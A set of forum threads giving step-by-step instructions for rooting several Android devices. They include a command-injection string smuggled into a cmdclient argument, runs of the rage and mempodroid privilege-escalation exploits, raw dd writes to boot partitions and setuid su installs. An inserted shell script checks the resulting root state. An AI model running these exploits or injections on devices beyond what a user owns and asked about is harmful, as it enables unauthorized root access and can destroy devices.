[ROOTED] Rooting An Acer Iconia A101 - Acer Iconia Tab A100

Yes, finally, for us A101 owners out there, a rooting method has finally been found!
Firstly, it's important to point out that I DID NOT DISCOVER this rooting method. All credit for that goes to ZeroNull and can be found in his original post here. All I have done is to essentially translate it to more native English and hopefully explain it a little better. I've been a bit more long winded than ZeroNull was, but it's kinda necessary to make things clear.
Finally, and most importantly:
DO THIS AT YOUR OWN RISK! NEITHER I NOR ZERONULL ARE TO BLAME IF YOU MESS UP YOUR TAB!
You will need a few things:
1. The A10x_Rooting.zip file attached at the bottom of this thread. This contains ADB and SU.
2. An A100 ROM. It's probably best to go for as early a version as you can but any should probably work. Get one from vache's thread here.
3. An A101 ROM. Any version will do, again you can get one from vache's thread above. Note there are some updated ROMs on about page 13 or so of that thread.
4. The ability to follow instructions CAREFULLY. Seriously, I can't stress this enough. One typo can make the process fail, so copy/paste the commands, OK?
5. Basic knowledge of how to open a cmd shell in Windows (I'm not a Linux person, but most of this guide will probably apply).
Right, on to the instructions!
Part One
1. Download all needed files as above and extract into a directory somewhere.
2. Connect your A101 to USB, make sure USB debugging is turned on, and open a command window in the same folder you extracted A10x_Rooting.zip into.
3. Copy the A100's update.zip to the root of your external SD card on the tablet.
4. Reboot into recovery (hold power and left side of the vol rocker until you see the text).
5. Wait for the A100 ROM to install. This is the slightly scary bit as you just emasculated your tab! :O
Part Two
6. Once your tab has booted, make sure USB debugging is on and go to your command window. Type:
Code:
adb devices
If all is well, you'll get your UID in response. You don't need this for rooting, but it's a damn good idea to write this down somewhere safe.
7. Assuming 6 was OK, then proceed. If it wasn't, you'll need to sort that out yourselves.
Enter the following commands.
Code:
adb shell
/system/bin/cmdclient ec_micswitch '`echo 'ro.kernel.qemu=1' > /data/local.prop`'
Nothing will echo back to you, and trying to ls that folder will give you a permission denied. Don't worry, it should have worked.
8. Type exit at the $ prompt to exit ADB shell.
9. Copy the A101 update.zip to the root of the external SD card, reboot to recovery and flash it.
Part Three
10. Once booted back up, go back to your command window and enter the following:
Code:
adb remount
adb push su /system/xbin/
adb shell "chmod 06755 /system/xbin/su"
11. Now you need to undo the qemu command. Enter the following in the command window.
Code:
adb shell "echo '#' >/data/local.prop"
Your root should now be 95% complete, but we're not quite finished yet.
12. Load the market and download BusyBox, SuperUser, and if you want it, Titanium Backup. Install all of these but DO NOT RUN THEM YET.
13. Reboot the device. Another scary part!
14. Once booted, run SuperUser then drop back to the desktop.
15. Run BusyBox and go through the install steps. During this SU should ask permission to give BB root access, if it does, it worked!
By the way, for me at least, SU moaned about being out of date whilst installing BB. Let BB install, then afterward, let SU update itself.
Important Note
After doing this once, if you install a newer ROM, you will NOT need to go back to the A100 to re-root, that part only has to be done one time. The local.prop file will now persist between ROMs so all you'll need to do is to go back to step 7 and proceed from there.
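
A check of the state this procedure leaves behind, as an added example that is not part of the original post or of ZeroNull's method. On these old builds `ro.kernel.qemu=1` in /data/local.prop is what keeps adbd running as root (which is why `adb remount` succeeds in step 10), so after step 11 the property should no longer be set and su should be setuid root. The function names and sample inputs are constructed; the inputs stand in for the contents of /data/local.prop and an `ls -l` line for /system/xbin/su.

```shell
#!/bin/sh
# Added example, not code from the thread. All sample data below is constructed.

# qemu_flag_state FILE
# Prints "set" if the last effective ro.kernel.qemu assignment in a
# local.prop-style file is 1, otherwise "cleared". Comment lines are skipped.
qemu_flag_state() {
    awk '
        /^[ \t]*#/ { next }
        {
            line = $0
            sub(/\r$/, "", line)          # tolerate CRLF from a Windows capture
            eq = index(line, "=")
            if (eq == 0) next
            key = substr(line, 1, eq - 1)
            val = substr(line, eq + 1)
            gsub(/^[ \t]+|[ \t]+$/, "", key)
            gsub(/^[ \t]+|[ \t]+$/, "", val)
            if (key == "ro.kernel.qemu") last = val
        }
        END { if (last == "1") print "set"; else print "cleared" }
    ' "$1"
}

# su_mode_state "LS_LINE"
# Classifies one `ls -l` line as "setuid-root", "not-setuid" or "not-root-owned".
# Accepts both toolbox ls (no link count) and GNU/busybox ls (with link count).
su_mode_state() {
    printf '%s\n' "$1" | awk '
        {
            mode  = $1
            owner = ($2 ~ /^[0-9]+$/) ? $3 : $2
            suid  = substr(mode, 4, 1)    # owner-execute slot: s or S means setuid
            if (owner != "root")                  print "not-root-owned"
            else if (suid == "s" || suid == "S")  print "setuid-root"
            else                                  print "not-setuid"
        }'
}

# post_root_report PROP_FILE "LS_LINE"
# Prints a one-line summary; returns 0 only when the qemu flag is cleared
# and su is setuid root, i.e. the state steps 10 and 11 are meant to produce.
post_root_report() {
    flag_state=$(qemu_flag_state "$1")
    su_state=$(su_mode_state "$2")
    echo "ro.kernel.qemu: $flag_state; su: $su_state"
    [ "$flag_state" = "cleared" ] && [ "$su_state" = "setuid-root" ]
}

# --- constructed sample data ---
tmp=$(mktemp -d)
printf 'ro.kernel.qemu=1\n' > "$tmp/after_step7.prop"     # what step 7 writes
printf '#\n'                > "$tmp/after_step11.prop"    # what step 11 writes
SU_LINE='-rwsr-sr-x root     root        26264 2011-12-01 10:00 su'

post_root_report "$tmp/after_step7.prop"  "$SU_LINE" || echo "  -> adbd would still start as root"
post_root_report "$tmp/after_step11.prop" "$SU_LINE" && echo "  -> expected end state"
rm -rf "$tmp"
```
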

How does one figure out which version they have?
Sent from my Acer Iconia using xda premium

Mordak said:
How does one figure out which version they have?
Sent from my Acer Iconia using xda premium
You mean a100 or a101? A100 is the wifi only version that most of us have. The A101 has a spot for a phone SIMM card.

Mordak said:
How does one figure out which version they have?
Sent from my Acer Iconia using xda premium
It's under Settings -> About
Though I'm kinda puzzled as to how come you don't know which model you bought...

Thanks
Been waiting for ages till i searched it in google today.
Is there any chance we can install recovery like CWM?

Not at this time. Devs are working hard trying to bypass the locked bootloader on the A100. I'm assuming the bootloader on the A101 is similar enough that whatever method eventually gets worked out would work on both. I may be wrong. Wouldn't surprise me if I was lol
Sent from my Inspire 4G using Tapatalk

Hope you're right
Uh, and i think you should bold this:
3. Copy the A100's update.zip to the root of your external SD card on the tablet.
Since i've missed the "external" sd card and just copied it right to the internal sd, the rom wasn't detected by then. My bad, but there may be people like me hahaha

icefish1412 said:
Hope you're right
Uh, and i think you should bold this:
3. Copy the A100's update.zip to the root of your external SD card on the tablet.
Since i've missed the "external" sd card and just copied it right to the internal sd, the rom wasn't detected by then. My bad, but there may be people like me hahaha
Point 4 of the "things you will need" covers that.
4. The ability to follow instructions CAREFULLY. Seriously, I can't stress this enough. One typo can make the process fail, so copy/paste the commands, OK?

FloatingFatMan said:
It's under Settings -> About
Though I'm kinda puzzled as to how come you don't know which model you bought...
I never saw a 3G version in any of the stores near me. I did see the spot where a sim could go but I had no idea this was the differentiating factor. Thanks for the info.

Will this rooting method work on the A100?

The A100 has its own rooting method, but there's no reason why it shouldn't. In fact, someone posted a slightly modded version of this method for that model, in the A100 rooting thread.

sorry but i can't apply
adb shell
/system/bin/cmdclient ec_micswitch '`echo 'ro.kernel.qemu=1' > /data/local.prop`'
what can i do?

^ Defining "I can't apply" would help...
Seriously, that's about as much help to debugging the problem as a chocolate teapot.

ok,
when i submit the command
/system/bin/cmdclient ec_micswitch '`echo 'ro.kernel.qemu=1' > /data/local.prop`'
i get this from the console
/system/bin/cmdclient ec_micswitch '`echo 'ro.kernel.qemu=1' > /data/local.prop`'
and when i follow the next steps
i cant remount

What ROM are you running on?

Related

[GUIDE] Temp to permanent root, using rage instead of visionary

There's already a guide here for obtaining permanent root using VISIONary, but some folks in #G2ROOT are having issues with the way that VISIONary modifies partitions. Using rage directly is a bit cleaner, since you know exactly what it's going to touch at each step of the way. I did NOT come up with any of this on my own, I'm building completely off of work that others have done. Speaking of which-
None of this would be possible without the tireless work that scotty2 put in. He stayed with the project for well over a month, through lots of smashed hopes and dead ends, until the solution was finally found. Were it not for his work, as well as the help of a few other key folks- we wouldn't be here. He deserves our thanks and some donations! We're talking hundreds of hours of work here, a couple bucks is not too much for that. His paypal is:
[email protected]
Send him some love! I'm not asking for anything myself, because I spent a half hour putting this together, and that doesn't deserve any donations!
G2 ROOT INSTRUCTIONS
=================================================
These are modified instructions based on the ones posted at http://bit.ly/g2root that use Visionary. A number of people have run into issues with the way that Visionary juggles around temporary partitions, and using the original root exploit is a much easier, and cleaner method for achieving permanent root. This tutorial will walk you through the rooting process by first achieving temporary root, and moving on to permanent root.
REQUIREMENTS
=================================================
Visionary disabled at boot or uninstalled completely
Android Terminal Emulator app
ADB
vision-combined-root.zip (Attached to this post, OR these two files: )
G2TempRoot.zip (http://forum.xda-developers.com/showthread.php?t=797042) NOTE: only download the files! Don't follow these instructions yet
vision-perm-root.zip (http://forum.xda-developers.com/showthread.php?t=833965) NOTE: again, just download the files from the thread.
In the commands to run below, $ or # represent the prompt and should NOT be entered as part of the commands.
VERY IMPORTANT!
Visionary has caused filesystem corruption for some users during the rooting process. Before attempting the instructions below, make sure that you have "auto run on boot" turned OFF, and reboot your system. Since you will not need visionary anyway after this, you might as well just uninstall visionary and reboot NOW before doing anything.
TEMP ROOT
=================================================
ON YOUR PC:
Unzip the G2TempRoot files to a folder. From a cmd window or terminal, navigate to that folder and execute these commands:
Code:
$ adb push su /sdcard/su
$ adb push Superuser.apk /sdcard/Superuser.apk
$ adb push rage /data/local/tmp/rage
$ adb push busybox /data/local/tmp/busybox
$ adb push root /data/local/tmp/root
$ adb shell chmod 0755 /data/local/tmp/*
ON YOUR PHONE:
Launch Terminal Emulator
/data/local/tmp/rage
Wait for the message: "Forked #### childs."
Menu > Reset Term - Terminal Emulator will exit.
Launch Terminal Emulator, it Force Closes. Launch a second time, and you'll have a root shell
**NOTE**: in the original directions from the XDA thread, you are instructed to run the /data/local/tmp/root script here. DON'T do this just yet. Leave the terminal window open.
PERM ROOT
=================================================
ON YOUR PC:
Unzip the vision-perm-root.zip and navigate to that folder. There will be four files. You will need to push two of these to your phone: hboot-eng.img, and one of the wpthis-[..].ko files.
If you HAVE applied the OTA update, push wpthis-OTA.ko.
If you HAVE NOT applied the OTA update, push wpthis-pre-OTA.ko.
Code:
$ adb push hboot-eng.img /data/local
$ adb push wpthis-OTA.ko /data/local
ON YOUR PHONE:
You should still have terminal emulator up, at a root prompt. Now run:
Code:
# insmod /data/local/wpthis-OTA.ko
You should see:
Code:
init_module 'wpthis-OTA.ko' failed (Function not implemented)
That means it worked. This next step is CRUCIAL. You must make sure that you are writing to the proper partition here or you could brick your phone. To be absolutely clear- the partition is mmcblk(zero)p(one)(eight)
Code:
dd if=/data/local/hboot-eng.img of=/dev/block/mmcblk0p18
You should see some messages indicating that it was written. Next, run:
Code:
# /data/local/tmp/root
This will lock in root, and give you 'su' access in the future. Next, run:
Code:
# sync
Now wait at least a minute, just to be safe. After waiting, reboot your phone using the power button. After it finishes starting up, launch the terminal emulator, and type 'su'. You should get the prompt asking you to grant permissions. If you got the prompt, congratulations! You have permanent root!
I used these instructions and they worked brilliantly.
Sounds like it's a little safer than using VISIONary, which some people in the thread are reporting can get confused and not let you root because it thinks you already have root, etc.
I love it when a plan comes together. Perma-root. thanks man, i never had much luck getting visonary to work so this was spot on. worked like a charm
*not smart enough*
*leaves thread*
I really try to leave ADB out of the equation since I'm not comfortable navigating it.... I suppose I could dedicate my time to learning it, but it's not worth it since I would only use it once every two years to root my phone. In 16 hours I'm sure there will probably be a one click perm root method out anyway.
It worked flawlessly!
I always get so stressed when I root my phones, especially without tutorial vids.
I first did my G1 and that worked perfectly fine.
My second attempt at rooting was with my MT3G and that resulted in a bricked device because one of the lines of code was incorrect in the thread.
This, however, was clearly and plainly spelled out exactly to what happened to my phone.
I give you my thanks.
Awesome- glad to hear it's working well for people. If anybody sees areas that I could improve in the description just let me know.
sinistersai4d4d said:
I really try to leave ADB out of the equation since I'm not comfortable navigating it....
ADB is worth it IMHO because it makes moving files around easy, whether you're rooted or not. You don't have to turn on SD card storage, you can just do adb pull/push etc to grab or put files when you need them. Worth the effort. The one click root should be out within the next couple days though, you are right about that one.
trigeek,
I already perm rooted earlier, but just wanted to say you gave a very nicely detailed explanation that anyone should be able to follow. Well done!
Great guide. I liked it a lot more than Unforgivens just because it doesn't rely on VisionARY which might mess things up.
Guide worked absolutely great, no problems. I did not try the visionary method first, but for some reason I just felt safer doing it in adb.
Thank you!
Sorry for the noob question...? but does this mean we have fully rooted to G2 and now we can load ROMS on it when they come out ????
Edit: Nevermind I didnt see the sticky
RaffieKol said:
Sorry for the noob question...? but does this mean we have fully rooted to G2 and now we can load ROMS on it when they come out ????
You got it!
RaffieKol said:
Sorry for the noob question...? but does this mean we have fully rooted to G2 and now we can load ROMS on it when they come out ????
Edit: Nevermind I didnt see the sticky
Custom ROMs, custom Recovery...the whole 9 yards
Thanks for posting this, it was so easy!
Thank you so very much it was a success
this is my first rooting on an android device... im freaking out... but here i go.... if something happens i will just report my phone lost and get a new one i guess ahahah still... im scared.
Issues
I was temp rooted before using rage and then thru Visionary. But I decided to go back to stock till we have permanent root. I perm rooted today using this method. But I'm having the following issues:
1) adb remount
- remount failed: Operation not permitted
2) when using Root Explorer in /system, toggling Mount R/W does not work
- the only way to mount it R/O is thru terminal/adb shell. Once mounted R/O, the only way to mount R/W again is thru a reboot. Issuing mount -o remount ro /system either in terminal or adb shell does not work.
i actually changed my mind... im going to wait for a one click untended root i guess.... too scary...
joackie27 said:
I was temp rooted before using rage and then thru Visionary. But I decided to go back to stock till we have permanent root. I perm rooted today using this method. But I'm having the following issues:
1) adb remount
- remount failed: Operation not permitted
2) when using Root Explorer in /system, toggling Mount R/W does not work
- the only way to mount it R/O is thru terminal/adb shell. Once mounted R/O, the only way to mount R/W again is thru a reboot. Issuing mount -o remount ro /system either in terminal or adb shell does not work.
make sure you have debugging enabled.
juanshop said:
i actually changed my mind... im going to wait for a one click untended root i guess.... too scary...
Not gonna happen.
then i guess.... im going to jump in it.... wish me luck...

[Tutorial] Rooting Your Device in Linux

Root Galaxy Nexus (Either GSM or LTE) in Linux (Personally in Ubuntu)
Disclaimer: I am not at fault for anything you have done to your phone (ie. Brick, break, etc.). You are doing this at your own discretion. I am merely stating what I did to unlock/root my phone.
Tutorial Broken Down Into Three Sections
I. Unlocking the bootloader
II. Installing Clockwork Mod Recovery
III. Installing SuperUser
Resources
1. Super User (used by flashing in Clockwork): http://download.clockworkmod.com/test/su.zip
You can get the latest version here: SuperUser by ChainsDD
2. Clockwork – based by carrier
1. Verizon (CDMA) version: CMW Galaxy Nexus
File name: recovery-clockwork-5.5.0.4-toro.img
MD5: b2d31c29b7ef785f9c0802a12264d322
File size: 5,263,360 (bytes)
2. GSM version: CMW Galaxy Nexus
File name: recovery-clockwork-5.5.0.2-maguro.img
MD5: 445887336a863573997ccbaeedddc984
File size: 5,427,200 (bytes)
Unlocking Bootloader
Part 1: Unlock
1. First off, you need to download the adb drivers. There have been mentions of just getting the drivers, but I actually have the entire SDK. You can download it here. http://developer.android.com/sdk/index.html
2. Plug in your device, then open up Terminal (Ctrl + Alt + T) and type in: “lsusb” (without quotes). This will pull up all the devices plugged into your usb slots. Look for the one that says samsung (others have found google, but please make note).
3. Find the device, then find where it says ID. After where it says ID, it should have a number/letter mix such as “04e8” or such. Make note of that for later.
4. Go to http://developer.android.com/guide/developing/device.html . This will give the instructions on how to Install the device drivers (specific to each manufacturer). Start from where it says “4. Set up your system to detect your device.”
5. Go to your internal and cd to platform-tools. (This should include both adb and fastboot.) Put your phone into fast boot. (Do this by holding the power, volume up, and volume down buttons while phone is off).
6. Once in fastboot, go back to your computer and type in “sudo fastboot oem unlock”. This will bring up the option to unlock your phone's bootloader on your device's screen. It will give you a disclaimer, and it will say that if you unlock, it will wipe all of your phone's data. Scroll to Yes using the vol up or vol down buttons, and select it with the power button.
7. If you boot straight from there, you will go through a series of boot loops (it was 2 for me) then will be prompted to go through the process of setting up your Google account again.
Congratulations, your phone is now unlocked. However, this doesn't mean that you have rooted your phone.
Rooting
Part 2: Putting Clockwork Mod Recovery On Your Phone
(do step one for preparation of Part 3)
1. First, we will want to push su.zip to your phone's Internal storage or “sdcard” partition. Open up Terminal and type the command “adb push 'directory_of_su.zip'/su.zip /sdcard/”. Hit enter/return and it should transfer over. (Based on the quality of usb cord, times of transfer may vary.)
To make this easier, put su.zip into the directory of adb. Then all you have to use for the command is “adb push su.zip /sdcard/”.
EDIT:
After you root, you have to delete /system/recovery-from-boot.p and reflash or else every time you reboot, the recovery partition will be written over by android. This can either be done in terminal (phone or comp) or by a file manager with root access (such as Root Explorer).
Reference: http://forum.xda-developers.com/showthread.php?t=1392336
Thanks vihil
2. Put your phone in fastboot mode again (vol up + vol down + power)
3. Go back to Terminal and type in “fastboot flash recovery 'whatever the file name is'”. This will flash CWM (Clockwork Mod) onto your phone, deleting your phone's stock recovery image.
EDIT: If it doesn't work, i.e. due to permissions, run with sudo
Part 3: Flashing Super User onto your phone.
1. Next, go into Clockwork by hitting the volume up or down buttons till you see recovery mode. Hit the power button to enter Clockwork.
2. Scroll down (using volume buttons) till you get to “install zip from sd card”. Use the power button to select it.
3. Scroll down to “su.zip” and select it. Then, hit the selection for installing the zip file.
4. Go back using the “Go Back” selection to return to the main screen.
5. Reboot the system using the “reboot system”.
Congratulations! You now have Root access!!!
Have fun with Flashing ROMs!
Special Thanks to scary alien on androidforums.com and jcarrz1 on XDA
Thanks a lot I was looking for exactly this. Appreciated. Will try in a few hours when I get my phone.
Downloaded the sdk file but have no idea what to do. My windows computer died and it would be a lot easier on that to do all this but all I have is a computer with linux currently so if anyone would be kind enough to tell me how to install sdk I'd appreciate it. I seen the read me and seen it says execute "android" first but I don't know how to do that. I realize this is incredibly annoying to the xda hive mind trust me I hate needing help like this I'm nothing close to a noob as far as rooting flashing and all that good stuff I'm just unfortunately stuck with only Linux. I'd really really appreciate it.
under the tools folder there is a script called android, u can either run it in a terminal or hopefully if u were to click it, it will ask if u want to run it!
If you want to run it, you can just cd to it in terminal, then do "./android" and that should do the trick.
./ is the way you execute scripts in linux.
Seems like my fastboot is stuck on `waiting for device`. I have the fastboot screen on my GN.
Before rebooting into fastboot `adb devices` successfully showed a device (i.e., usb debugging is enabled, dunno whether it is needed for the unlocking):
$ fastboot oem unlock
< waiting for device >
Any idea?
EDIT: Found the solution. After doing a `fastboot devices` it told me "no permissions fastboot" so I needed to be root on my computer for it to work.
FadedLite said:
If you want to run it, you can just cd to it in terminal, then do "./android" and that should do the trick.
./ is the way you execute scripts in linux.
Thank you! That worked correctly and installed it. Now the next step to check the usb and if its there does not work, I might be entering this incorrectly but I typed just lsusb and enter nothing happened, held down ctrl, alt, t then typed in lsusb and nothing happened then just copied that entire part in case I was supposed to and got this.
[[email protected] ~]$ (Ctrl, Alt, T): lsusb
bash: syntax error near unexpected token `:'
Like I said I'm not expecting help because I know XDA doesn't like noobie questions, I will be greatly appreciative if you have patience with me and will even be willing to donate once I unlock the BL and root it. Thank you again.
C-4Nati said:
Thank you! That worked correctly and installed it. Now the next step to check the usb and if its there does not work, I might be entering this incorrectly but I typed just lsusb and enter nothing happened, held down ctrl, alt, t then typed in lsusb and nothing happened then just copied that entire part in case I was supposed to and got this.
[[email protected] ~]$ (Ctrl, Alt, T): lsusb
bash: syntax error near unexpected token `:'
Like I said I'm not expecting help because I know XDA doesn't like noobie questions, I will be greatly appreciative if you have patience with me and will even be willing to donate once I unlock the BL and root it. Thank you again.
You don't really need that step. Since '04e8' is Samsung and you have a Samsung device it will likely always be 04e8.
Part 1, 3. and 4. can be summarized as following:
Put the following line into /etc/udev/rules.d/51-android.rules:
SUBSYSTEM=="usb", ATTR{idVendor}=="04e8", MODE="0666", GROUP="plugdev"
Execute: chmod a+r /etc/udev/rules.d/51-android.rules
Type the following to verify it is working: "adb devices" It should display something like:
List of devices attached
01492B093401000F device
Part 1, 6. should probably be changed to "sudo fastboot oem unlock"
Also, Part 2, 1. the preparation makes no sense to me: "(do step one for preparation of Part 3)". How can I go into Clockwork recovery before completing Part 2? Since Part 2 is about installing Clockwork...
Edit: And I just realised, C-4Nati, you should not write the "(Ctrl, Alt, T):" out.. that's just a shortcut to open a terminal. Just "lsusb" is fine. Then it should work.
---------- Post added at 11:33 AM ---------- Previous post was at 11:09 AM ----------
For anyone wondering why the step by step instructions in the OP do not work:
You need to flash the Clockwork recovery and install su.zip before you can remove the /system/recovery-from-boot.p (and if you follow that link provided it will cost you around $3.50 but you should be able to do it manually, will try to figure it out).
---------- Post added at 11:38 AM ---------- Previous post was at 11:33 AM ----------
(I couldn't find the /system/recovery-from-boot.p on my GN filesystem but maybe someone else does)
To remove /system/recovery-from-boot.p:
$ adb shell
$ su
# mount -o rw,remount -t ext4 /dev/block/platform/omap/omap_hsmmc.0/by-name/system /system
# rm /system/recovery-from-boot.p
# mount -o ro,remount -t ext4 /dev/block/platform/omap/omap_hsmmc.0/by-name/system /system
For simplicity, you can shorten that to: mount -o rw,remount /system
You can also delete it from a terminal on the phone or any file manager that allows root access. I think the free ES file explorer has root options.
vihil said:
You don't really need that step. Since '04e8' is Samsung and you have a Samsung device it will likely always be 04e8.
Part 1, 3. and 4. can be summarized as following:
Put the following line into /etc/udev/rules.d/51-android.rules:
SUBSYSTEM=="usb", ATTR{idVendor}=="04e8", MODE="0666", GROUP="plugdev"
Execute: chmod a+r /etc/udev/rules.d/51-android.rules
Type the following to verify it is working: "adb devices" It should display something like:
List of devices attached
01492B093401000F device
Part 1, 6. should probably be changed to "sudo fastboot oem unlock"
Also, Part 2, 1. the preparation makes no sense to me: "(do step one for preparation of Part 3)". How can I go into Clockwork recovery before completing Part 2? Since Part 2 is about installing Clockwork...
Edit: And I just realised, C-4Nati, you should not write the "(Ctrl, Alt, T):" out.. that's just a shortcut to open a terminal. Just "lsusb" is fine. Then it should work.
---------- Post added at 11:33 AM ---------- Previous post was at 11:09 AM ----------
For anyone wondering why the step by step instructions in the OP do not work:
You need to flash the Clockwork recovery and install su.zip before you can remove the /system/recovery-from-boot.p (and if you follow that link provided it will cost you around $3.50 but you should be able to do it manually, will try to figure it out).
---------- Post added at 11:38 AM ---------- Previous post was at 11:33 AM ----------
(I couldn't find the /system/recovery-from-boot.p on my GN filesystem but maybe someone else does)
To remove /system/recovery-from-boot.p:
$ adb shell
$ su
# mount -o rw,remount -t ext4 /dev/block/platform/omap/omap_hsmmc.0/by-name/system /system
# rm /system/recovery-from-boot.p
# mount -o ro,remount -t ext4 /dev/block/platform/omap/omap_hsmmc.0/by-name/system /system
for needing to type in lsusb, i found that as somewhat of a precaution. I had seen on other threads that others had their device show up as either google or samsung. So i just figured rather check first instead of installing both or something.
for the preparation, basically you do that since your phone is already on. after flashing cwm, you would have to boot back into your phone, push the file to your sdcard, then boot back into recovery. All it does is that it saves just a bit of time.
As for the sudo fastboot, I didn't actually have to do that, but i'll add it, Thanks.
As for the cwm terminal commands, i'll add that as well. Thanks again.
FadedLite said:
Part 3: Flashing Super User onto your phone.
1. Next, go into Clockwork by hitting the volume up or down buttons till you see recovery mode. Hit the power button to enter Clockwork.
2. Scroll down (using volume buttons) till you get to “install zip from sd card”. Use the power button to select it.
3. Scroll down to “su.zip” and select it. Then, hit the selection for installing the zip file.
4. Go back using the “Go Back” selection to return to the main screen.
5. Reboot the system using the “reboot system”.
Congratulations! You now have Root access!!!
Have fun with Flashing ROMs!
not yet. after flashing su-bin-3.0.3.2-efghi-signed.zip (which is just the binary), the user still needs to flash Superuser-3.0.7-efghi-signed.zip, to have Superuser.apk placed in /system/app, otherwise GUI apps won't have access to su. (unless, of course, the zip you are linking here has them both)
It's preferable to have users linked to ChainsDD website, there people will find latest binaries and Superuser.apk. I also don't see any mention to him in the OP. Even if this is a tutorial, don't forget to give credit where needed.
Some help for an Ubuntu Noob/Not a Noob to Windows
Hi all,
Long story short, I no longer have Windows (nor a way to load Windows without a purchase; I'd rather not). So I have a fresh install of Ubuntu Linux 11.10. I have read this guide and some of the helpful responses and have yet to be able to get adb and fastboot up and running. I am beginning to understand the nuances of Ubuntu and have tackled adb and fastboot in Windows but Ubuntu is different. I would say I have put in two 12 hour sessions with no desire to pack it in and go back to Windows (I am avoiding a VM as well).
Here is where I seem to be stuck (mind you I have done a fresh install numerous times to start with a fresh playing field in case I have messed up something): Whether downloading the full SDK through Eclipse (cos I'd like to dev apps soon and why not have it?) or downloading the SDK on its own, I get it without fail. The steps leading up to entering in commands for terminal so that the computer recognizes either just my Nexus or a slew of OEMs are easy enough but maybe I am messing up. It is where getting the computer to see my device (udev steps) I can't seem to get it right. I have even looked at other guides for reference (most seem messy and convoluted) but keep coming back here.
I know you probably need more to go on and I am sooooooo willing to tell more. I just hope someone is down to help a brother out. Like I said, I just need some direction. I have manually rooted and all that jazz, just in windows. Thanks in advance for your help.
jmar
jmartino5920 said:
Hi all,
Long story short, I no longer have Windows (nor a way to load Windows without a purchase; I'd rather not). So I have a fresh install of Ubuntu Linux 11.10. I have read this guide and some of the helpful responses and have yet to be able to get adb and fastboot up and running. I am beginning to understand the nuances of Ubuntu and have tackled adb and fastboot in Windows but Ubuntu is different. I would say I have put in two 12 hour sessions with no desire to pack it in and go back to Windows (I am avoiding a VM as well).
Here is where I seem to be stuck (mind you I have done a fresh install numerous times to start with a fresh playing field in case I have messed up something): Whether downloading the full SDK through Eclipse (cos I'd like to dev apps soon and why not have it?) or downloading the SDK on its own, I get it without fail. The steps leading up to entering in commands for terminal so that the computer recognizes either just my Nexus or a slew of OEMs are easy enough but maybe I am messing up. It is where getting the computer to see my device (udev steps) I can't seem to get it right. I have even looked at other guides for reference (most seem messy and convoluted) but keep coming back here.
I know you probably need more to go on and I am sooooooo willing to tell more. I just hope someone is down to help a brother out. Like I said, I just need some direction. I have manually rooted and all that jazz, just in windows. Thanks in advance for your help.
jmar
Are you getting a "waiting on device" message or something similar when you run adb or fastboot?
Forget about the udev nonsense (not important really until you start developing full time) and just drop a sudo before your commands.
You can shoot me a PM or a gtalk (same username as my xda) if you want and I'd be more than happy to help you get your system going.
Thanks, still a bit more annoying than Windows but this tutorial makes it easy.
Sorry if this is ignorant, but can I use these instructions with Unix & terminal on Mac OS X? I'm thinking yes???
I rooted mine in linux as well... No problems. For some reason I was able to do it much easier though...
I did the fastboot oem unlock step above (Part 1). Rebooted then installed superuser from the android market. Then I installed Clockworkmod from the android market.
Done.
Not sure if I'm missing out on something by doing it this way but so far I've had no issues....

[HOW-TO] [GSM & CDMA] Root without Unlocking Bootloader via exploit (for 4.0.1/4.0.2)

Edit: This does not work on anything newer than ICL53F (i.e., 4.0.2). It works fine on ITL41D (4.0.1), ITL41F (4.0.1) and ICL53F (4.0.2).
Once you have got root, you can now use segv11's BootUnlocker app to unlock your bootloader without wiping anything. Easy as pie!
Disclaimer: I take no credit for this exploit or the implementation of it (but I will take credit for the step-by-step). Thanks to kendong2 for pointing it out to me here.
So, it looks like zx2c4 has found a local privilege escalation exploit. See source here, and saurik has managed to package it together for Android. See here. Although this may be old news to some, I hadn't seen it before.
So what does this all mean:
If you are running a 2.6.39 kernel (or above), which all Galaxy Nexus' are, you can now root your device without having to unlock your bootloader (and without losing your data).
Moreover, you should now be able to root your device even if your hardware buttons are not working.
Additionally, this allows those who have not received an OTA update and want to apply it without having an unlocked bootloader or root to do so by copying the OTA update to /cache from /sdcard.
Notes:
1) This assumes that you have USB Debugging enabled on your device (Settings > Developer Options > Enable USB Debugging) and the drivers for your device installed on your computer. For the drivers, I would recommend you remove all old drivers and install these. If you don't know how to install them, or are having issues, look here.
2) This needs to be done over ADB, as a terminal emulator on-device does not have the appropriate access. If you do not have ADB, I've attached it in the zip. Unzip all files.
3) Some users indicate that, once finished the procedure, they needed to open the Superuser app.
Step-by-step:
1) Download the attached files to your computer and unzip them in the same directory as your adb.exe file;
2) Open a command prompt in the same directory;
3) Copy the files to your device:
adb push mempodroid /data/local/tmp/mempodroid
adb push su /data/local/tmp/su
adb push Superuser.apk /data/local/tmp/Superuser.apk
4) Open a shell: adb shell
5) Change permission on mempodroid to allow it to run: chmod 777 /data/local/tmp/mempodroid
6) Run the exploit: ./data/local/tmp/mempodroid 0xd7f4 0xad4b sh
Note: Once you do step 6, your prompt should change from $ to #. If not, it did not work.
7) Mount the system partition as rw: mount -o remount,rw -t ext4 /dev/block/mmcblk0p1 /system
8) Copy su to /system: cat /data/local/tmp/su > /system/bin/su
9) Change permissions on su: chmod 06755 /system/bin/su
10) Copy Superuser.apk: cat /data/local/tmp/Superuser.apk > /system/app/Superuser.apk
11) Change permissions on Superuser.apk: chmod 0644 /system/app/Superuser.apk
12) Mount the system partition as r/o: mount -o remount,ro -t ext4 /dev/block/mmcblk0p1 /system
13) Rescind root: exit
14) Exit the ADB shell: exit
15) Done. You now should have root without having to unlock your bootloader.
This is the same as https://github.com/saurik/mempodroid
saurik ftw.
times_infinity said:
This is the same as https://github.com/saurik/mempodroid
saurik ftw.
Not sure what you are getting at? I mentioned saurik in the first post, and the link you posted is in the first post. And I mentioned that this may be old news, but I haven't seen it anywhere before today in the GN forums.
Yikes! This exploit works on any kernel from 2.6.39 and >. This could become a common root method for many devices. Linus Torvalds himself posted the fix commit! Nice work by zx2c4!
Sleuth255 said:
Yikes! This exploit works on any kernel from 2.6.39 and >. This could become a common root method for many devices. Linus Torvalds himself posted the fix commit! Nice work by zx2c4!
You need ics to have a vulnerable kernel version, so given the number of devices which currently have ics officially, I doubt it will be common. I'd also expect Google and vendors to correct this in next release.
Also many custom kernels don't have this flaw as they are at or over 3.0.18 or have patched it. This prevents gaining unnoticed root.
Sent from my Galaxy Nexus
Hmmm I thought 2.6.39 was found in GB builds. This exploit is almost a root fix for the Moto DX 4.5.621 fiasco. Unfortunately the kernel for that build is 2.6.32.9.
Sent from my Galaxy Nexus using xda premium
This was huge in the headlines a few weeks back. It's nice to see someone putting it to a good use!
Sent from my Galaxy Nexus using xda premium
